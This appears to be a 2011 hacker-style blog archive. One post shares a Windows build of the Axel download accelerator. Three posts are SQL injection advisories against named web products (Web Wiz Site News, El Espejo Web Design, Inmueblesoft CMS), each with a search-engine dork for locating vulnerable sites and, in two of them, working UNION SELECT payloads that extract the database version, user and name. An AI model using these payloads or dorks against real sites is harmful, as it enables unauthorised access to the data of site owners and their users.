Wednesday, June 15, 2011

Axel Accelarator for Windows

I google a bit and found someone that share this Axel accelarator for windows users.

Download here.
http://www.mediafire.com/?wi8dw1hbaqinhfz

extract and just use it!

usage like below
Usage: axel.exe [options] url1 [url2] [url...]

--max-speed=x -s x Specify maximum speed (bytes per second)
--num-connections=x -n x Specify maximum number of connections
--output=f -o f Specify local output file
--search[=x] -S [x] Search for mirrors and download from x servers
--header=x -H x Add header string
--user-agent=x -U x Set user agent
--no-proxy -N Just don't use any proxy server
--quiet -q Leave stdout alone
--verbose -v More status information
--alternate -a Alternate progress indicator
--help -h This information
--version -V Version information
screenshot




credit to

// ghuntley [code]https://github.com/ghuntley/cygwin-axel/[/code]
// ~n2j3 [code]http://st0rage.org/~n2j3/[/code] :drunk:

Monday, June 6, 2011

Web Wiz Site News Vulnerable to SQL Injection

#####################################################################
## Title : Web Wiz Site News Vulnerable to SQL Injection ##
## Found by : p0pc0rn ##
## Vendor: http://www.webwiz.co.uk/ ##
## Dork : Powered by Web Wiz Site News ##
#####################################################################

- POC -
http://site.com/news/news_item.asp?NewsID=[SQL]

- Thanks -
p0pc0rn

edit: found by others already. http://www.1337day.com/exploits/15677

Friday, June 3, 2011

El Espejo Web Design Vulnerable to Multiple SQL Injection

#####################################################################
## Title : El Espejo Web Design Vulnerable to Multiple SQL Injection ##
## Found by : p0pc0rn ##
## Vendor: http://www.elespejodesign.com.ar/sitio/index.php ##
## Dork : !@#$%^&*()_ ##
#####################################################################

- POC -
http://site.com/sitio/something.php?id=[SQL]
http://site.com/sitio/detalle_foto.php?id=-236 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(version(),0x3a,user(),0x3a,database()),16,17,18,19--

http://site.com/sitio/detalle_edificios.php?id=-144 UNION SELECT 1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44--

not just parameter index.php,there are more parameters vulnerable. Check it out.

- Thanks -
p0pc0rn

Inmueblesoft CMS Vulnerable to Multiple SQL Injection


##################################################################
## Title : Inmueblesoft CMS Vulnerable to Multiple SQL Injection ##
## Found by : p0pc0rn ##
## Vendor: www.inmueblesoft.com ##
## Dork : intext:"Inmueblesoft" filetype:php ##
#################################################################


- POC -
http://site.com/index.php?tabla=something&id=[SQL]
http://site.com/index.php?tabla=something&id=-15 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95--



not just parameter index.php,there are more parameters vulnerable. Check it out.

- Thanks -
p0pc0rn